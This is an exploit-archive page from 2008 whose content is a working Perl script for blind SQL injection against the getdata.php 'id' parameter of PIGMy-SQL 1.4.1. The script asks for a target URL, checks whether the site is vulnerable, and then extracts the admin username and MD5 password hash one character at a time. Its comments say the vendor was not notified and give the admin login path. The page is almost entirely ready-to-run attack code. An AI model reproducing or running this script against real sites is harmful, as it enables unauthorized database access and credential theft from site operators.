PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PIGMy-SQL <= 1.4.1 (getdata.php id) Blind SQL Injection Exploit
# Published : 2008-04-04
# Author : t0pP8uZz
# Previous Title : Blogator-script 0.95 (incl_page) Remote File Inclusion Vulnerability
# Next Title : Blogator-script 0.95 (id_art) Remote SQL Injection Vulnerability

#!/usr/bin/perl

# - PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -
# PIGMy-SQL is vulnerable because the mysql querys are insecure, therefor it allows an attack to execute sql querys, since the..
#	..vulnerable page only returns a picture we have to use a blind sql script, heres a little one i coded below, it will be alot faster using things like sqlmap etc. but this does the job
#
# Discovered And Coded By: t0pP8uZz
# Discovered On: April 4 2008
# Vendor has not been notifed!
# Admin login is at /admin/
# passwords are encrypted in MD5
# END OF

use strict;
use LWP::Simple;

print "--------------------------------------------------n";
print "- PIGMy-SQL <= 1.4.1 Blind SQL Injection Exploit -n";
print "-         Coded And Discovered By t0pP8uZz       -n";
print "-                                                -n";
print "- This exploit will obtain the admin user/pass.. -n";
print "-        ..Using a blind sql injection attack    -n";
print "--------------------------------------------------n";

print "nTarget Site: ";
	chomp(my $url=<STDIN>);
	
print "Valid Photo ID: ";
	chomp(my $pid=<STDIN>);

if(inject_test($url, $pid)) {

	print "nInjecting Please Wait.. This could take several minutes.n";
	my $result = blindattack($url, $pid);
	print "Exploited! Admin Details Are: ".$result;
	exit;
}

sub blindattack {

	my $url    = shift;
	my $pid    = shift;
	my $done   = 0;
	my $substr = 1;
	my $chr    = 48;
	my $res    = undef;
	
	while($done == 0) {
		my $content = get($url."/getdata.php?id=".$pid." and ascii(substring((select concat(name,0x3a,pass,0x5E) FROM galleryusers),".$substr.",1))=".$chr."/*");
		
		if($content =~ /#/ && $chr == 94) { $done = 1; }
			elsif($content =~ /#/) { $res .= chr($chr); $substr++; $chr = 48; }
				else { $chr++; }
	}
	return $res;
}

sub inject_test {

	my $url = shift;
	my $pid = shift;
	
	my $true  = get($url."/getdata.php?id=".$pid." and 1=1");
	my $false = get($url."/getdata.php?id=".$pid." and 1=2");
	
	if($true =~ /#/ && $false !~ /#/) { 
		print "nTarget Vulnerable!";
		return 1;
	}
	else {
		print "Target not vulnerable! die'ing!";
		exit;
	}
}

# www.Syue.com [2008-04-04]